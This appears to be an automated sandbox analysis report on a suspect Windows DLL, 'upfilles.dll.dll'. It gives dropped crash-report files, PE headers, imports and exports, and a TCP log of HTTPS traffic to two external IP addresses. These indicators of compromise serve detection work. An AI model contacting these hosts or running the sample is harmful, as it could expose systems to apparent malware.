                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER46C4.tmp.WERInternalMetadata.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8522
                                                                                                                Entropy (8bit):3.6958245523678235
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJoigmd6Y7GGgmfWfiwsprH89b+vWfuKm:R6lXJdgmd6Y6GgmfWq2+ef6
                                                                                                                MD5:57975B44072D1C9B3E80DB2266217745
                                                                                                                SHA1:A9CF9831C70448BFE57EB598D192F042A2AE3A6D
                                                                                                                SHA-256:415AD9CE27C4A61A389B2D2AE85DF89BB06FEFD9971BDB3399CAE445E58B8910
                                                                                                                SHA-512:93854E117CDB0F89602B01AA667CE2E15D7607242C6EC26A4B7060F5FCB7EB905ADB72A73E979F8B35E01DA8F21F8CEE3A99D7FA40DD04ABBBD3428F6F83C212
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.8.<./.P.i.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4704.tmp.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4777
                                                                                                                Entropy (8bit):4.481691067176541
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYSYm8M4JCNCF0saFBwtjyq85mQCrdptSTSNd:uIjfqI7+b7VCJiP0GqpoONd
                                                                                                                MD5:243DA7FD47223239375D054C23BDE13D
                                                                                                                SHA1:01345C28EFD562EEDE44945D9F8B54A30951ABC4
                                                                                                                SHA-256:CF4636B318E7DCECACDC72437D290E86C0501BCA90B77EE7585C1C837614D3D3
                                                                                                                SHA-512:9BCE637D0F2AA10F4FD3BE688AFC8B97DC87CD20E03157250D55EC6368C6E353BB80A712BA982C01CA00B082C593634FA65DC3295A1EF8F9DCAA3C69330CCD3F
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1835008
                                                                                                                Entropy (8bit):4.46640558354698
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:/IXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:wXD94zWlLZMM6YFHa+9
                                                                                                                MD5:B7B3B5CD7790EDF0686FF777BA5097D3
                                                                                                                SHA1:ED234CE4B519238F46F4AA9519B3C51AFB301F20
                                                                                                                SHA-256:221475E4ACF30CBC675FA384CAE2C143B9C04EF7B913D8D65B0052080F31D095
                                                                                                                SHA-512:2F5813E176688BB57E91FD992373740377CDE50F0EBF56BD906A17D6325F158525F85FA13581310839B2EB9219FD5E6F03A3DE3E3E9A32CF3DAAC2D1BAE26831
                                                                                                                Malicious:false
                                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...%...............................................................................................................................................................................................................................................................................................................................................U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Entropy (8bit):7.38766220411242
                                                                                                                TrID:
                                                                                                                • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                • DOS Executable Generic (2002/1) 1.70%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                File name:upfilles.dll.dll
                                                                                                                File size:520'704 bytes
                                                                                                                MD5:ccb6d3cb020f56758622911ddd2f1fcb
                                                                                                                SHA1:4a013f752c2bf84ca37e418175e0d9b6f61f636d
                                                                                                                SHA256:f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
                                                                                                                SHA512:6ed929967005eaa6407e273b53a1fedcb2b084d775bed17272fd05b1ce143dbf921ac201246dfbfdbe663c7351e44c12f162e6f03343548b69b5d4598bb3492e
                                                                                                                SSDEEP:12288:8XG3MpAOIQ1LjbJFqzqUtYP4VnRk62yoK2:SpAOfFJIq/Py8K2
                                                                                                                TLSH:4AB4BE4A37A80CB6E867C17D88634705E3B27D610761C6DF1290536F9F3BBD2663AB12
                                                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........C.s.". .". .". .D.!.". .D.!o". .J.!.". .J.!.". .J.!.". tK.!.". .D.!.". .D.!.". .". q". tK.!.". tK.!.". tK.!.". tK? .". ."W .".

                                                                                                                File Icon

                                                                                                                Icon Hash:7ae282899bbab082

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x18000e1c0
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:true
                                                                                                                Imagebase:0x180000000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA
                                                                                                                Time Stamp:0x5C24FE09 [Thu Dec 27 16:30:01 2018 UTC]
                                                                                                                TLS Callbacks:0x80020fe0, 0x1
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:90ad3b5a283c3a333bb222c03419fb76

                                                                                                                Authenticode Signature

                                                                                                                Signature Valid:
                                                                                                                Signature Issuer:
                                                                                                                Signature Validation Error:
                                                                                                                Error Number:
                                                                                                                Not Before, Not After
                                                                                                                  Subject Chain
                                                                                                                    Version:
                                                                                                                    Thumbprint MD5:
                                                                                                                    Thumbprint SHA-1:
                                                                                                                    Thumbprint SHA-256:
                                                                                                                    Serial:

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    dec eax
                                                                                                                    mov dword ptr [esp+08h], ebx
                                                                                                                    dec eax
                                                                                                                    mov dword ptr [esp+10h], esi
                                                                                                                    push edi
                                                                                                                    dec eax
                                                                                                                    sub esp, 20h
                                                                                                                    dec ecx
                                                                                                                    mov edi, eax
                                                                                                                    mov ebx, edx
                                                                                                                    dec eax
                                                                                                                    mov esi, ecx
                                                                                                                    cmp edx, 01h
                                                                                                                    jne 00007F611CBAF4F7h
                                                                                                                    call 00007F611CBAF8D0h
                                                                                                                    dec esp
                                                                                                                    mov eax, edi
                                                                                                                    mov edx, ebx
                                                                                                                    dec eax
                                                                                                                    mov ecx, esi
                                                                                                                    dec eax
                                                                                                                    mov ebx, dword ptr [esp+30h]
                                                                                                                    dec eax
                                                                                                                    mov esi, dword ptr [esp+38h]
                                                                                                                    dec eax
                                                                                                                    add esp, 20h
                                                                                                                    pop edi
                                                                                                                    jmp 00007F611CBAF384h
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    dec eax
                                                                                                                    mov dword ptr [esp+10h], ebx
                                                                                                                    dec eax
                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                    push esi
                                                                                                                    push edi
                                                                                                                    inc ecx
                                                                                                                    push esi
                                                                                                                    dec eax
                                                                                                                    sub esp, 10h
                                                                                                                    xor ecx, ecx
                                                                                                                    mov dword ptr [00029DFEh], 00000002h
                                                                                                                    xor eax, eax
                                                                                                                    mov dword ptr [00029DEEh], 00000001h
                                                                                                                    cpuid
                                                                                                                    inc esp
                                                                                                                    mov edx, ecx
                                                                                                                    inc esp
                                                                                                                    mov ecx, edx
                                                                                                                    xor ecx, 444D4163h
                                                                                                                    xor edx, 69746E65h
                                                                                                                    mov ebp, ebx
                                                                                                                    inc ebp
                                                                                                                    xor ebx, ebx
                                                                                                                    xor ebp, 68747541h
                                                                                                                    inc esp
                                                                                                                    mov eax, ebx
                                                                                                                    or ebp, edx
                                                                                                                    inc esp
                                                                                                                    mov esi, eax
                                                                                                                    or ebp, ecx
                                                                                                                    inc ecx
                                                                                                                    xor ecx, 49656E69h
                                                                                                                    inc ecx
                                                                                                                    xor eax, 756E6547h
                                                                                                                    inc ecx
                                                                                                                    lea eax, dword ptr [ebx+01h]
                                                                                                                    xor ecx, ecx
                                                                                                                    inc ecx
                                                                                                                    xor edx, 6C65746Eh
                                                                                                                    cpuid
                                                                                                                    inc ebp
                                                                                                                    or eax, ecx
                                                                                                                    mov dword ptr [esp], eax
                                                                                                                    inc ebp
                                                                                                                    or eax, edx
                                                                                                                    mov dword ptr [esp+04h], ebx
                                                                                                                    mov esi, ecx
                                                                                                                    mov dword ptr [esp+08h], ecx
                                                                                                                    mov edi, eax
                                                                                                                    mov dword ptr [esp+00h], edx

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x36de00xbc.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x36e9c0x8c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x1238.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3b0000x22bc.pdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x3c4000x3278
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x8fc.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x315700x54.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x316d00x28.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x315d00x100.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x250000x3d8.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x23a990x23c0087bfc32636bf93aa5ba6a79278de1d82False0.5472779173951049data6.420263931637599IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x250000x12b200x12c000f7e92ec4b27ef7a718d78d4d512f916False0.4034114583333333OpenPGP Secret Key Version 34.778349716646358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x380000x2b340x1600a4dd3c567a44787ef36b75c1461eadc7False0.189453125data3.77323134284555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .pdata0x3b0000x22bc0x24004b6b0ab05d617b8443d04115ebcf4698False0.4678819444444444data5.261331885690949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0x3e0000x12380x1400262a27cc3c07916543c338d007e971a7False0.3376953125data4.197268760185116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0x400000x8fc0xa00029935b97db1b1dda5ddd384d84afaceFalse0.52734375data5.178504761959821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                    hVr0x410000x430000x42e00b359e2ed16a1c00b78e0035c276c8cf4False0.9683703271028037data7.985612673503669IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    REGISTRY0x3e6c00xcASCII text, with CRLF line terminatorsEnglishUnited States1.6666666666666667
                                                                                                                    REGISTRY0x3e5980x125ASCII text, with CRLF line terminatorsEnglishUnited States0.7747440273037542
                                                                                                                    REGISTRY0x3e6d00x1fcASCII text, with CRLF line terminatorsEnglishUnited States0.5866141732283464
                                                                                                                    TYPELIB0x3e8d00x7b8dataEnglishUnited States0.31983805668016196
                                                                                                                    RT_STRING0x3f0880x2cdataEnglishUnited States0.5681818181818182
                                                                                                                    RT_VERSION0x3e2000x398OpenPGP Public KeyEnglishUnited States0.45652173913043476
                                                                                                                    RT_MANIFEST0x3f0b80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    KERNEL32.dllUnmapViewOfFile, FreeLibrary, GetModuleFileNameW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, LoadResource, SizeofResource, FindResourceW, lstrcmpiW, MultiByteToWideChar, MapViewOfFile, EncodePointer, EnterCriticalSection, LeaveCriticalSection, GetThreadLocale, SetThreadLocale, CreateFileW, GetFileSizeEx, CreateFileMappingW, GetCurrentThreadId, GetCurrentProcessId, DeleteCriticalSection, InitializeCriticalSectionEx, GetLastError, RaiseException, DecodePointer, CloseHandle, CreateEventW, OpenEventA, CreateEventA, WaitForSingleObjectEx, ResetEvent, SetEvent, WriteConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, LocalAlloc, SetLastError, LocalFree, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, InterlockedFlushSList, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, HeapSize, HeapReAlloc, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, SetFilePointerEx, GetStringTypeW, SetStdHandle, FlushFileBuffers
                                                                                                                    USER32.dllCharNextW
                                                                                                                    ADVAPI32.dllRegQueryInfoKeyW, RegOpenKeyExW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, RegSetValueExW
                                                                                                                    ole32.dllCoTaskMemRealloc, CoTaskMemFree, CoCreateInstance, StringFromGUID2, CoTaskMemAlloc
                                                                                                                    OLEAUT32.dllVarUI4FromStr, SysFreeString, SysAllocString, SysStringLen, LoadTypeLib, RegisterTypeLib, UnRegisterTypeLib
                                                                                                                    ntdll.dllNtRequestWaitReplyPort, NtConnectPort, NtClose, NtRequestPort, RtlCaptureContext, RtlLookupFunctionEntry, NtCreateSection, RtlVirtualUnwind, RtlNtStatusToDosError, RtlInitUnicodeString

                                                                                                                    Exports

                                                                                                                    NameOrdinalAddress
                                                                                                                    DllCanUnloadNow10x18000b1c0
                                                                                                                    DllGetClassObject20x18000b060
                                                                                                                    DllInstall30x18000b350
                                                                                                                    stow40x18000b1f0
                                                                                                                    DllUnregisterServer50x18000b330

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishUnited States

                                                                                                                    Network Behavior

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    May 11, 2024 00:04:12.876111984 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:12.876151085 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:12.876234055 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:12.884301901 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:12.884325027 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.100040913 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.100138903 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:13.150934935 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:13.150954962 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.151766062 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.151813984 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:13.153366089 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:13.196130991 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.836091995 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.836138010 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:13.836318970 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.836368084 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:13.836373091 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.836404085 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:13.836424112 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.836445093 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:13.836451054 CEST4434974591.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:04:13.836477041 CEST49745443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:04:14.160665989 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:14.160695076 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:14.160757065 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:14.161567926 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:14.161585093 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:14.349921942 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:14.349992037 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:14.633188009 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:14.633209944 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:14.633583069 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:14.633660078 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:14.633950949 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:14.680125952 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.302793026 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.302824020 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.302925110 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.302937031 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.302953005 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.303011894 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.303020000 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.303076029 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.423475027 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.423537016 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.423574924 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.423590899 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.423614025 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.423616886 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.423635960 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.423640013 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.423652887 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.423682928 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.423687935 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.423732996 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.544538021 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.544625044 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.544735909 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.544791937 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.545012951 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.545084953 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.545223951 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.545291901 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.545304060 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.545350075 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.665793896 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.665921926 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.665981054 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.666047096 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.666162968 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.666223049 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.787254095 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.787345886 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.787383080 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.787396908 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.787437916 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.787437916 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.787859917 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.787950039 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.788012028 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.788074017 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.788597107 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.788633108 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.788666964 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.788672924 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.788682938 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.788746119 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.908390045 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908490896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.908793926 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908823967 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908847094 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908876896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.908876896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.908888102 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908951044 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029175997 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029218912 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029264927 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029280901 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029320002 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029320002 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029334068 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029392958 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029403925 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029464960 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.156616926 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.156735897 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.156819105 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.156900883 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.156963110 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.157041073 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.157193899 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.157263994 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.281892061 CEST44349750138.124.183.215192.168.2.4
